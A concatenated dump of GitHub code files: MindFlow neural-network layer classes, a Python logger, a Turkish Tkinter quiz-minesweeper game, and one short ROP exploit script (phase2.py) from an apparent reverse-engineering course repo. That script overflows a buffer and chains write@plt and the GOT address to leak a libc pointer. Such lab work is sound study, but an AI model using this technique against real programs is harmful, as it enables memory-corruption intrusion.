function for bias\"\"\"\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n out = np.random.uniform(-bound, bound, fan_out)\n return Tensor(out, mstype.float32)\n\n\nclass InputScale(nn.Cell):\n r\"\"\"\n Scale the input value to specified region based on :math:`(x_i - input_center)*input_scale`\n\n Args:\n input_scale (list): The scale factor of input.\n input_center (Union[list, None]): Position offset of coordinate translation. Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, channels)`.\n\n Raises:\n TypeError: If `input_scale` is not a list.\n TypeError: If `input_center` is not a list or ``None``.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import InputScale\n >>> from mindspore import Tensor\n >>> inputs = np.random.uniform(size=(16, 3)) + 3.0\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> input_scale = [1.0, 2.0, 4.0]\n >>> input_center = [3.5, 3.5, 3.5]\n >>> net = InputScale(input_scale, input_center)\n >>> output = net(inputs).asnumpy()\n >>> assert np.all(output[:, 0] <= 0.5) and np.all(output[:, 0] >= -0.5)\n >>> assert np.all(output[:, 1] <= 1.0) and np.all(output[:, 0] >= -1.0)\n >>> assert np.all(output[:, 2] <= 2.0) and np.all(output[:, 0] >= -2.0)\n \"\"\"\n\n def __init__(self, input_scale, input_center=None):\n super(InputScale, self).__init__()\n check_param_type(input_scale, \"input_scale\", data_type=list)\n check_param_type(input_center, \"input_center\",\n data_type=(type(None), list))\n input_scale = np.array(input_scale)\n self.input_scale = Tensor(input_scale, mstype.float32)\n if input_center is None:\n self.input_center = Tensor(\n np.zeros(input_scale.shape), mstype.float32)\n else:\n self.input_center = Tensor(np.array(input_center), mstype.float32)\n self.mul = ops.Mul()\n\n def construct(self, x):\n out = self.mul(x - self.input_center, self.input_scale)\n return out\n\n\ndef _get_out_net_activation(is_out, act):\n if is_out:\n return None\n return act\n\n\nclass FCSequential(nn.Cell):\n r\"\"\"\n A sequential container of the dense layers, dense layers are added to the container sequentially.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n layers (int): The total number of layers, include input/hidden/output layers.\n neurons (int): The number of neurons of hidden layers.\n residual (bool): full-connected of residual block for the hidden layers. Default: ``True``.\n act (Union[str, Cell, Primitive, None]): activate function applied to the output of the fully connected layer,\n eg. ``'ReLU'``.Default: ``\"sin\"``.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'normal'``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'default'``.\n weight_norm (bool): Whether to compute the sum of squares of weight. Default: ``False``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n TypeError: If `layers` is not an int.\n TypeError: If `neurons` is not an int.\n TypeError: If `residual` is not a bool.\n ValueError: If `layers` is less than 3.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import FCSequential\n >>> from mindspore import Tensor\n >>> inputs = np.ones((16, 3))\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> net = FCSequential(3, 3, 5, 32, weight_init=\"ones\", bias_init=\"zeros\")\n >>> output = net(inputs).asnumpy()\n >>> print(output.shape)\n (16, 3)\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n layers,\n neurons,\n residual=True,\n act=\"sin\",\n weight_init='normal',\n has_bias=True,\n bias_init='default',\n weight_norm=False):\n super(FCSequential, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.layers = layers\n self.neurons = neurons\n self.residual = residual\n self.act = act\n self.weight_init = weight_init\n self.has_bias = has_bias\n self.bias_init = bias_init\n self.weight_norm = weight_norm\n\n self._check_params()\n self.network = nn.SequentialCell()\n self._create_networks()\n\n def construct(self, x):\n return self.network(x)\n\n def _create_networks(self):\n self._add_linear_block(\n self.in_channels, self.neurons, weight_init=self.weight_init)\n self._add_hidden_blocks(\n self.neurons, self.neurons, weight_init=self.weight_init)\n self._add_linear_block(\n self.neurons, self.out_channels, weight_init=self.weight_init, is_out_net=True)\n\n def _check_params(self):\n check_param_type(self.layers, \"layers\",\n data_type=int, exclude_type=bool)\n check_param_type(self.neurons, \"neurons\",\n data_type=int, exclude_type=bool)\n check_param_type(self.residual, \"residual\", data_type=bool)\n if self.layers < 3:\n raise ValueError(\n \"FCSequential have at least 3 layers, but got layers: {}\".format(self.layers))\n\n def _add_linear_block(self, in_channels, out_channels, weight_init, is_out_net=False):\n act = _get_out_net_activation(is_out_net, self.act)\n self.network.append(LinearBlock(in_channels,\n out_channels,\n activation=act,\n weight_init=weight_init,\n has_bias=self.has_bias,\n bias_init=_bias_init(\n in_channels, out_channels)\n if self.bias_init == \"default\" else self.bias_init,\n ))\n\n def _add_res_block(self, in_channels, out_channels, weight_init, is_out_net=False):\n act = _get_out_net_activation(is_out_net, self.act)\n self.network.append(ResBlock(in_channels,\n out_channels,\n activation=act,\n weight_init=weight_init,\n has_bias=self.has_bias,\n bias_init=_bias_init(\n in_channels, out_channels)\n if self.bias_init == \"default\" else self.bias_init,\n ))\n\n def _add_hidden_blocks(self, in_channels, out_channels, weight_init):\n for _ in range(self.layers - 2):\n if self.residual:\n self._add_res_block(in_channels, out_channels, weight_init)\n else:\n self._add_linear_block(in_channels, out_channels, weight_init)\n\n\nclass MultiScaleFCSequential(nn.Cell):\n r\"\"\"\n The multi-scale fully conneted network.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n layers (int): The total number of layers, include input/hidden/output layers.\n neurons (int): The number of neurons of hidden layers.\n residual (bool): full-connected of residual block for the hidden layers. Default: ``True``.\n act (Union[str, Cell, Primitive, None]): activate function applied to the output of the fully connected layer,\n eg. ``'ReLU'``.Default: ``\"sin\"``.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as `input`. The values of str refer to the function `initializer`. Default: ``'normal'``.\n weight_norm (bool): Whether to compute the sum of squares of weight. Default: ``False``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype\n is same as `input`. The values of str refer to the function `initializer`. Default: ``'default'``.\n num_scales (int): The subnet number of multi-scale network. Default: ``4``.\n amp_factor (Union[int, float]): The amplification factor of input. Default: ``1.0``.\n scale_factor (Union[int, float]): The base scale factor. Default: ``2.0``.\n input_scale (Union[list, None]): The scale factor of input x/y/t. If not ``None``, the inputs will be\n scaled before set in the network. Default: ``None``.\n input_center (Union[list, None]): Center position of coordinate translation. If not ``None``, the inputs will be\n translated before set in the network. Default: ``None``.\n latent_vector (Union[Parameter, None]): Trainable papameter which will be concated will the sampling inputs\n and updated during training. Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n TypeError: If `num_scales` is not an int.\n TypeError: If `amp_factor` is neither int nor float.\n TypeError: If `scale_factor` is neither int nor float.\n TypeError: If `latent_vector` is neither a Parameter nor ``None``.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import MultiScaleFCSequential\n >>> from mindspore import Tensor, Parameter\n >>> inputs = np.ones((64,3)) + 3.0\n >>> inputs = Tensor(inputs.astype(np.float32))\n >>> num_scenarios = 4\n >>> latent_size = 16\n >>> latent_init = np.ones((num_scenarios, latent_size)).astype(np.float32)\n >>> latent_vector = Parameter(Tensor(latent_init), requires_grad=True)\n >>> input_scale = [1.0, 2.0, 4.0]\n >>> input_center = [3.5, 3.5, 3.5]\n >>> net = MultiScaleFCSequential(3, 3, 5, 32,\n ... weight_init=\"ones\", bias_init=\"zeros\",\n ... input_scale=input_scale, input_center=input_center, latent_vector=latent_vector)\n >>> output = net(inputs).asnumpy()\n >>> print(output.shape)\n (64, 3)\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n layers,\n neurons,\n residual=True,\n act=\"sin\",\n weight_init='normal',\n weight_norm=False,\n has_bias=True,\n bias_init=\"default\",\n num_scales=4,\n amp_factor=1.0,\n scale_factor=2.0,\n input_scale=None,\n input_center=None,\n latent_vector=None\n ):\n super(MultiScaleFCSequential, self).__init__()\n check_param_type(num_scales, \"num_scales\",\n data_type=int, exclude_type=bool)\n check_param_type(amp_factor, \"amp_factor\",\n data_type=(int, float), exclude_type=bool)\n check_param_type(scale_factor, \"scale_factor\",\n data_type=(int, float), exclude_type=bool)\n\n self.cell_list = nn.CellList()\n self.num_scales = num_scales\n self.scale_coef = [amp_factor * (scale_factor**i)\n for i in range(self.num_scales)]\n\n self.latent_vector = latent_vector\n if self.latent_vector is not None:\n check_param_type(latent_vector, \"latent_vector\",\n data_type=Parameter)\n self.num_scenarios = latent_vector.shape[0]\n self.latent_size = latent_vector.shape[1]\n in_channels += self.latent_size\n else:\n self.num_scenarios = 1\n self.latent_size = 0\n\n for _ in range(self.num_scales):\n self.cell_list.append(FCSequential(in_channels=in_channels,\n out_channels=out_channels,\n layers=layers,\n neurons=neurons,\n residual=residual,\n act=act,\n weight_init=weight_init,\n has_bias=has_bias,\n bias_init=bias_init,\n ))\n if input_scale is not None:\n self.input_scale = InputScale(input_scale, input_center)\n else:\n self.input_scale = ops.Identity()\n\n self.cast = ops.Cast()\n self.concat = ops.Concat(axis=1)\n\n def construct(self, x):\n x = self.input_scale(x)\n if self.latent_vector is not None:\n batch_size = x.shape[0]\n latent_vectors = self.latent_vector.view(self.num_scenarios, 1,\n self.latent_size).repeat(\n batch_size // self.num_scenarios,\n axis=1).view((-1, self.latent_size))\n x = self.concat((x, latent_vectors))\n out = 0\n for i in range(self.num_scales):\n x_s = x * self.scale_coef[i]\n out = out + self.cast(self.cell_list[i](x_s), mstype.float32)\n return out\n","repo_name":"mindspore-ai/mindscience","sub_path":"MindFlow/mindflow/cell/basic_block.py","file_name":"basic_block.py","file_ext":"py","file_size_in_byte":20997,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"95"} +{"seq_id":"74423879991","text":"# -*- coding: utf8\nimport os\nimport sys\n\nimport logging\n\nimport datetime\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n# 2017/3/27 15:50\n__author__ = 'haizhu'\n\n\nclass Logger:\n def __init__(self, log_dir=\"/data/log/jiemo-postPV\"):\n self._logDir = log_dir\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n logging.basicConfig(\n filename=os.path.join(log_dir, \"main.log_{0}\".format((datetime.datetime.now()).strftime(\"%Y-%m-%d\"))),\n level=logging.INFO,\n format='[%(asctime)s %(levelname)s %(process)d %(filename)s %(lineno)d] - %(message)s')\n\n # 初始化暑促\n logger = logging.getLogger(\"markdown\")\n logger.setLevel(logging.INFO)\n\n file = os.path.join(self._logDir, \"score.md\");\n\n if os.path.exists(file):\n os.remove(file)\n\n fh = logging.FileHandler(file)\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(message)s')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n pass\n","repo_name":"hai046/postPV","sub_path":"Jiemo_logger.py","file_name":"Jiemo_logger.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"6156947258","text":"from helper import *\nfrom time import sleep\n\nwrite_plt = hex2le(\"08048290\")\nwrite_got = hex2le(\"08049434\")\n\nquit_plt = hex2le(\"080482b0\")\n\nwelcome = \"Bye!\\n\\n\"\n\ndef main():\n log(read_all(sys.stdin))\n\n exploit = 20 * \"B\" + \\\n write_plt + \\\n quit_plt + \\\n write_got\n\n write_bytes(int2le(len(exploit)))\n write_bytes(exploit)\n response = read_all(sys.stdin)\n if not response.startswith(welcome):\n log(\"Something wrong...\")\n log(le2hex(response[len(welcome):len(welcome)+4]))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"pulver22/ReversingEngineering","sub_path":"rop/exploit/phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42433593100","text":"import random as rnd\nimport time\nimport os\nimport tkinter as tk\nimport subprocess as sp\nimport platform as plt\n\n#Kullanılacak yazı tipleri için makro tanımlar.\nTIP = (\"Verdana\", 12)\nTIP_1 = (\"Helvetica\", 24)\nK_TIP_1 = (\"Helvetica\", 12)\nYOL = \".{}harici_dosyalar\".format(os.sep)\nYOL_1 = \".{}harici_dosyalar{}mayın_soruları\".format(os.sep, os.sep)\nYOL_2 = \".{}harici_dosyalar{}bonus_soruları\".format(os.sep, os.sep)\nYOL_3 = \".{}harici_dosyalar{}kullanıcı_dosyaları\".format(os.sep, os.sep)\nYOL_4 = \".{}görseller\".format(os.sep)\n\nclass PythonBebegim(tk.Tk):\n \"Mayınlardan python ile kurtulun.\"\n def __init__(self, *args, **kwargs):\n \"\"\"Kontrol sınıfının yapılandırıcı fonksiyonudur.\nKontrol sınıfımızın üst sınıfının yapılandırıcı fonksiyonunun\nözelliklerini super fonksiyonuyla alır.Ayrıca\noyunun diğer sayfalarını içerisinde barındıracak taşıyıcı sayfayı\ntanımlar.Oyundaki tüm sayfalarının sınıfları örnekleyerek bir\nsözlük içine koyar ve yeri geldiğinde bu sayfaların gösterilmesini\nsağlar\"\"\"\n super().__init__(*args, **kwargs)\n #Oyunun pencere başlığı\n tk.Tk.wm_title(self, \"Mayın Tarlası\")\n #Sayfa boyutu sabitlenir ve boyutlandırılır.\n self.resizable(width=False, height=False)\n self.geometry('{}x{}'.format(372, 400))\n \n #Tüm sayfaları barındıracak ana sayfa.\n self.tasiyici = tk.Frame(self)\n self.tasiyici.pack()\n \n #programın kullanacağı ek dosya ve klasörleri denetler.\n #yoksa oluşturur, varsa işleme devam eder.\n Islemler.kaynak_denetimi()\n \n #Oyundaki tüm sayfaların örneklerinin bulunduğu sözlük.\n #Bu sözlükte tüm sayfaların sınıfları örneklenmiştir ve\n #kullanılmaya hazırdır.cerceve_goster fonksiyonu ile\n #gereken zamanda sayfalar gösterilir.\n self.cerceveler = {}\n for sayfa in [\"AnaSayfa\", \"Oyun\", \"YuksekSkorlar\", \"Ogretici\"]:\n sınıf_adı = eval(sayfa)\n self.cerceveler[sayfa] = sınıf_adı(self.tasiyici, self)\n self.cerceveler[sayfa].grid(row=0, column=0, sticky=\"nsew\")\n #başlangıçta anasayfayı gösterir.\n self.cerceve_goster(\"AnaSayfa\")\n \n def cerceve_goster(self, sayfa_adı):\n \"\"\"sayfa adlarını parametle olarak alır.Bu sayfa adını\nkullanarak, sayfalarının örneklerinin bulunduğu sözlükten sayfayı\nbulur.Daha sonra tk.raise metodu ile bu sayfayı ekranda gösterir.\"\"\"\n self.cerceve = self.cerceveler[sayfa_adı]\n self.cerceve.tkraise()\n \n def sayfa_yenile(self, sayfa_listesi):\n \"\"\"yenilecek sayfaların adını bir liste içinde alır\n ve bu sayfaları yeniden oluşturulur.Böylece sayfa içinde olan\n değişiklikler ekrana yansır.\"\"\"\n for sayfa in sayfa_listesi:\n sınıf_adı = eval(sayfa)\n self.cerceveler[sayfa] = sınıf_adı(self.tasiyici, self)\n self.cerceveler[sayfa].grid(row=0, column=0, sticky=\"nsew\")\n \n \n \n \nclass AnaSayfa(tk.Frame):\n def __init__(self, tasiyici, kontrolcu):\n \"\"\"Anasayfa sınıfıdır.Programın sayfalarına\nerişmek için gerekli butonları içerir.\"\"\"\n #Frame sınıfının niteliklerini super fonksiyonu ile alır.\n #tasiyici bu çerçeveyi taşıyan kök penceredir.\n super().__init__(tasiyici)\n #Oyun başlığıdır.\n self.baslik_etiketi = tk.Label(self, text=\"Mayın Tarlası\",\n relief=tk.GROOVE, borderwidth=5,\n width=20, fg=\"black\", bg=\"gray\",\n font=TIP_1)\n self.baslik_etiketi.grid(row=0, column=0, columnspan=3)\n #Oyun penceresine geçiş butonudur.\n self.buton = tk.Button(self, text=\"Oyun\", relief=tk.RAISED,\n borderwidth=2, width=20, font=K_TIP_1,\n command=\n lambda: kontrolcu.cerceve_goster(\"Oyun\"))\n self.buton.grid(row=1, column=1)\n #Öğretici penceresine geçiş butonudur.\n self.buton1 = tk.Button(self, text=\"Öğretici\", relief=tk.RAISED,\n borderwidth=2, width=20, font=K_TIP_1,\n command=\n lambda: kontrolcu.cerceve_goster(\"Ogretici\"))\n self.buton1.grid(row=2, column=1)\n #Yüksek skorlar penceresine geçiş butonudur.\n self.buton2 = tk.Button(self, text=\"Yüksek Skorlar\",\n relief=tk.RAISED, borderwidth=2,\n width=20, font=K_TIP_1, command=lambda:\n kontrolcu.cerceve_goster(\"YuksekSkorlar\"))\n self.buton2.grid(row=3, column=1)\n \n \nclass Oyun(tk.Frame):\n \"\"\"Oyunun yaratıldığı sınıftır.\"\"\"\n def __init__(self, tasiyici, kontrolcu):\n super().__init__(tasiyici)\n \n self.kontrolcu = kontrolcu\n \n self.harita = Islemler.son_haritayi_bul()\n self.buton_sayisi = Islemler.satir_sutun(self.harita)\n self.buton_takibi()#buton sayisini kontrol eder.\n\n self.puan_etiketi = tk.Label(self, text= \"0\", font=TIP_1)\n self.puan_etiketi.grid(row=0, column=0, columnspan=3)\n \n self.tarla_tasiyici = tk.Frame(self, padx=10, pady=10)\n self.tarla_tasiyici.grid(row=1, column=0, columnspan=3)\n \n for r in range(len(self.harita)):\n for c in range(self.buton_sayisi // len(self.harita)):\n if self.harita[r][c] == 'x':\n bos_buton = tk.Button(self.tarla_tasiyici, \n relief=tk.RAISED, width=2,\n borderwidth=2)\n bos_buton[\"command\"] = (lambda buton=bos_buton : \n self.bos_butonlar(buton))\n bos_buton.grid(row=r, column=c)\n elif self.harita[r][c] == '?':\n soru_buton = tk.Button(self.tarla_tasiyici, \n relief=tk.RAISED, width=2,\n borderwidth=2)\n soru_buton[\"command\"] = (lambda buton=soru_buton :\n self.soru_butonu(buton))\n \n soru_buton.grid(row=r, column=c)\n elif self.harita[r][c] == 'b':\n bonus_buton = tk.Button(self.tarla_tasiyici,\n relief=tk.RAISED, width=2,\n borderwidth=2)\n bonus_buton[\"command\"] = (lambda buton=bonus_buton :\n self.bonus_butonu(buton))\n bonus_buton.grid(row=r, column=c)\n \n self.donus_butonu = tk.Button(self, text='Ana Sayfa',\n relief=tk.RAISED, width=10,\n borderwidth=2,\n command=self.sayfa_gecisi)\n self.donus_butonu.grid(row=2, column= 0)\n \n self.yenile_butonu = tk.Button(self, text=\"Oyunu Yenile\", \n relief=tk.RAISED, width=10, \n borderwidth=2, \n command=lambda: \n self.kontrolcu.sayfa_yenile(['Oyun']),\n state=tk.DISABLED)\n self.yenile_butonu.grid(row=2, column=2)\n \n \n \n def soru_butonu(self, buton):\n \"\"\"Bir Toplevel sayfası oluşturur ve\nsoru ile tamamlanacak betiği gösterir.60 saniye açık kalır.\nSoru cevaplanmadan sayfa kapatılırsa, oyunu sıfırlar.\"\"\"\n buton['state'] = tk.DISABLED\n buton['text'] = '?'\n soru = SoruToplevel(self, self.kontrolcu)\n self.buton_sayisi -= 1\n\n \n def bonus_butonu(self, buton):\n buton['state'] = tk.DISABLED\n buton['text'] = 'B'\n self.buton_sayisi -= 1\n \n def bos_butonlar(self, buton):\n buton['state'] = tk.DISABLED\n buton['text'] = 'X'\n self.puan_etiketi[\"text\"] = str(eval(\n self.puan_etiketi[\"text\"]) + 1)\n \n self.buton_sayisi -= 1\n \n def sayfa_gecisi(self):\n self.kontrolcu.sayfa_yenile(['Oyun'])\n self.kontrolcu.cerceve_goster('AnaSayfa')\n \n def buton_takibi(self):\n \"\"\"Aktif buton sayısını kontrol eder.\nEğer aktif buton sayısı 0'a indiyse oyunu yeniler.\"\"\"\n if self.buton_sayisi <= 0:\n self.yenile_butonu.config(state=\"normal\")\n else:\n #Her program döngüsünde 1000 kere çalıştır.\n self.after(1000,self.buton_takibi)\n \n\nclass Ogretici(tk.Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n \nclass YuksekSkorlar(tk.Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\nclass Islemler:\n \"\"\"Oyunun altyapıyı ilgilendiren arayüzle bağlantılı,\nolmayan işlerini yapan fonksiyonları bulunduran sınıftır.\"\"\"\n def __init__(self):\n \"\"\"boş başlatıcı fonksiyon.Sınıfımızdaki metodları örneklemeden\nkullanabiliyoruz.Bu yüzden başlatıcı fonksiyonumuz boş.\"\"\"\n pass\n \n @classmethod\n def harita_yarat(cls, boyutlar=(8,8), esya_listesi=['x', 'b', '?']):\n \"\"\"Verilen boyutlarda, item listesindeki elemanlar ile\n2 boyutlu harita oluşturur.Elemanların bulunma sıklığı, esya\nlistesindeki elemanların sırasına göre azalır.\"\"\"\n eksen_x, eksen_y = boyutlar#eksen boyutları değişkene atanır.\n harita = []\n for satir in range(eksen_x):\n bir_satir = []\n for sutun in range(eksen_y):\n random_sayi = rnd.randint(0, 100)#random sayı tutulur.\n if random_sayi == 0 or random_sayi == 100:\n #random sayı 0 veya 100 ise\n bir_satir.append(esya_listesi[-1])\n elif random_sayi > 10 and random_sayi < 90:\n #random sayı 10 ile 80 arasında ise\n bir_satir.append(esya_listesi[0])\n else:\n try:\n #esya listesi 2 elemanlı olarak verilirse\n #oluşacak hata önlenir.\n bir_satir.append(rnd.choice(esya_listesi[1:-1]))\n except IndexError:\n bir_satir.append(esya_listesi[-1])\n harita.append(bir_satir)\n \n return harita\n \n @classmethod\n def harita_kontrolu(cls, harita, esya_listesi=['x', 'b', '?']):\n \"\"\"Parametre olarak verilen harita ve esya_listesi ile\nbir harita skoru oluşturur.Böylece daha fazla çeşitte eşya\niçeren harita daha yüksek skora sahip olur.\"\"\"\n skor = 0\n for satir in harita:\n for sutun in satir:\n if sutun == esya_listesi[0]:\n skor += 1\n elif sutun in esya_listesi[1:-1]:\n skor += 4\n elif sutun == esya_listesi[-1]:\n skor += 40\n return skor\n \n @classmethod\n def son_haritayi_bul(cls, sayac = 5):\n \"\"\"Parametre olarak verilen kere harita_olustur\nfonksiyonuyla harita oluşturur ve skorunu bulur.En yüksek skora sahip\nharitayı son harita olarak döndürür.\"\"\"\n son_skor = 0\n son_harita = None\n for i in range(sayac):\n harita = cls.harita_yarat()\n ara_skor = cls.harita_kontrolu(harita)\n if ara_skor > son_skor:\n son_skor = ara_skor\n son_harita = harita\n \n return son_harita\n \n @classmethod\n def betik_islet(cls, komut_listesi):\n \"\"\"komut listesindeki komutlar ile Popen nesnesi\n oluşturur.Komut listesinin çıktılarını ve hatalarını, Popen\n nesnesinin communicate komutuyla yakalar ve çıktı değeri\n olarak döndürür.Bu fonksiyon kullanıcının yazdığı kodları\n bir python dosyasına kaydetmek ve bunu yürüterek\n çıktısını bulmak içindir.\"\"\"\n surec = sp.Popen(komut_listesi, stdout=sp.PIPE, stderr=sp.PIPE)\n try:\n #popen nesnesi ile bağlantı kurulur ve\n #girilen komutun çıktısı ile verdiği hata\n #bir değişkende tutulur.\n cikti, hata = surec.communicate(timeout=15)\n except TimeoutExpired:\n surec.kill()\n cikti, hata = surec.communicate()\n #popen nesnesi çıktılar ve hataları byte olarak döndürür.\n #byte'ları utf-8 karakter kodlama sistemine çevirerek\n #anlaşılır çıktılar elde ederiz.\n return cikti.decode(\"utf-8\"), hata.decode(\"utf-8\")\n \n @classmethod\n def yorumlayici_bul(cls):\n \"\"\"sistem adı platform kütüphanesi system fonksiyonu ile\nbulunur.Eğer sistem adı linux ise python 3x yorumlayıcısı nasıl\nadlandırılmış o bulunur.bu yorumlayıcı adı olarak ilerde\nbetik çalıştırmak için tutulur.Eğer sistem windows ise\npython yorumlayıcısı python.exe olarak tutulur.\"\"\"\n sistem_adi = plt.system()#sistem adı bul.\n yorumlayici = None\n if sistem_adi == \"Linux\":\n cikti, hata = cls.betik_islet([\"python3\", \"-V\"])\n if hata == '':#python3 komutu hata yaratmıyorsa\n yorumlayici = \"python3\"\n else:\n #python3 komutu hata yaratıyorsa python3\n #python komutu ile çağrılıyordur.\n yorumlayici = \"python\"\n elif sistem_adi == \"Windows\":\n yorumlayici = \"python.exe\"\n \n return yorumlayici\n \n @classmethod\n def kaynak_denetimi(cls):\n \"\"\"programın kullanacağı dosya ve klasörleri\ndenetler.Eğer varlarsa, işleme devam eder.Yoksa gerekli klasörleri\nve dosyaları oluşturur.\"\"\"\n klasor_listesi = [YOL, YOL_1, YOL_2, YOL_3]\n for klasor in klasor_listesi:\n if os.path.exists(klasor):\n pass\n else:\n os.mkdir(klasor)\n \n dosya_listesi = [\"soru0.py\", \"soru1.py\", \"soru2.py\", \"soru3.py\",\n \"soru4.py\", \"soru5.py\", \"soru6.py\", \"soru7.py\",\n \"soru8.py\", \"soru9.py\"]\n \n soru0 = \"\"\"\n#Üç kenarı a,b,c değişkenleriyle\n#5,6,7 olarak verilmiş bir üçgenin\n#alanını hesaplayan aşağıdaki programı tamamlayınız.\na = 5\nb = 6\nc = 7\ns = (a + b + c) / 2\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\nprint(\"Üçgenin alanı {}.\".format(area))\"\"\"\n \n soru1 = \"\"\"\n#a ve b şeklinde 6 ve 19 olarak belirlenmiş\n#değişkenlerin tek mi çift mi olduğunu bulan\n#ve yazdıran aşağıdaki programı tamamlayınız.\ndef tek_cift(sayi):\n if sayi % 2 == 0:\n return \"çift\"\n else:\n return \"tek\"\na = 6\nb = 19\nprint(\"{} sayısı {}tir.\".format(a, tek_cift(a)))\nprint(\"{} sayısı {}tir.\".format(b, tek_cift(b)))\"\"\"\n\n soru2 = \"\"\"\n#1'den 10'a kadar tamsayıların toplamını bulan\n# ve yazdıran aşağıdaki programı tamamlayınız.\nsonuc = 0\nfor sayi in range(1, 11):\n sonuc += sayi\nprint(sonuc)\"\"\"\n\n soru3 = \"\"\"\n#Bir yılın artık yıl olup olmadığını bulan ve\n#2017 ile 2000 yıllarının artık olup olmadığını\n#yazdıran aşağıdaki programı tamamlayınız.\ndef artik_yil(yil):\n if (yil % 4) == 0:\n if (yil % 100) == 0:\n if (yil % 400) == 0:\n print(\"{} artık yıldır.\".format(yil))\n else:\n print(\"{} artık yıl değildir\".format(yil))\n else:\n print(\"{} artık yıldır\".format(yil))\n else:\n print(\"{} artık yıl değildir.\".format(yil))\nartik_yil(2017)\nartik_yil(2000)\"\"\"\n\n soru4 = \"\"\"\n#liste halinde verilmiş 5,8,4,96,2\n#sayılarının en büyüğünü bulan ve yazdıran\n#aşağıdaki programı tamamlayınız.\nsayi_listesi = [5, 8, 4, 96, 2]\nsonuc = sayi_listesi[0]\nfor sayi in sayi_listesi[1:]:\n if sayi > sonuc:\n sonuc = sayi\n else:\n continue\nprint(\"{} en büyük sayıdır.\".format(sonuc))\"\"\"\n \n soru5 = \"\"\"\n#5 ve 7 sayısının faktöriyel değerini\n#bulan ve yazdıran aşağıdaki programı tamamlayınız.\ndef faktoriyel_bul(sayi):\n if sayi == 0:\n return 1\n else:\n return sayi * faktoriyel_bul(sayi - 1)\nprint(\"{} in faktöriyeli {}\".format(5, faktoriyel_bul(5)))\nprint(\"{} in faktöriyeli {}\".format(7, faktoriyel_bul(7)))\"\"\"\n\n soru6 = \"\"\"\n#1'den 5'e kadar olan sayıların karesini ve küpünü\n#içeren 2 boyutlu bir liste üreten aşağıdaki fonksiyonu\n#tamamlayınız.(bir satır 'sayı, karesi, küpü' şeklindedir.)\niki_boyut_liste = []\nfor i in range(1, 6):\n satir = [i, i**2, i**3]\n iki_boyut_liste.append(satir)\nprint(iki_boyut_liste)\"\"\"\n\n soru7 = \"\"\"\n#çekoslovakyalılaştıramadıklarımızdanmısınız\n#harf dizisinde her harften kaç tane olduğunu\n#bulan ve '... harfinden ... tane vardır.'\n#şeklinde yazdıran aşağıdaki programı tamamlayınız.\ndef harf_sayici(kelime):\n veri_sozlugu = {}\n for harf in kelime:\n if harf in veri_sozlugu.keys():\n veri_sozlugu[harf] += 1\n else:\n veri_sozlugu[harf] = 1\n for sozcuk, sayisi in veri_sozlugu.items():\n print(\"{} harfinden {} tane vardır.\".format(sozcuk, sayisi))\nharf_sayici(\"çekoslovakyalılaştıramadıklarımızdanmısınız\")\"\"\"\n\n soru8 = \"\"\"\n#[[12, 15, 27],\n# [20, 22, 45],\n# [8, 10, 97]] 2 boyutlu listesinden 5'e\n#tam bölünebilen sayıları bulup yazdıran aşağıdaki\n#programı tamamlayınız.\nliste = [[12, 15, 27]\n [20, 22, 45]\n [8, 10, 97]]\nfor satir in liste:\n for sayi in satir:\n if sayi % 5 == 0:\n print(\"{} sayisi 5 ile bölünür.\".format(sayi))\"\"\"\n \n soru9 = \"\"\"\n#6. ve 10. sıradaki fibonacci sayılarını bulan\n#ve bu sayıları yazdıran aşağıdaki programı tamamlayınız.\ndef fibonacci_bul(sayi_sirasi):\n if sayi_sirasi < 2:\n return 1\n return fibonacci_bul(sayi_sirasi-1) + fibonacci_bul(sayi_sirasi-2)\nprint(\"{}. sıradaki fibonacci sayısı {}.\".format(6, fibonacci_bul(6)))\nprint(\"{}. sıradaki fibonacci sayısı {}.\".format(10, fibonacci_bul(10)))\n\"\"\"\n \n for dosya in dosya_listesi:\n if 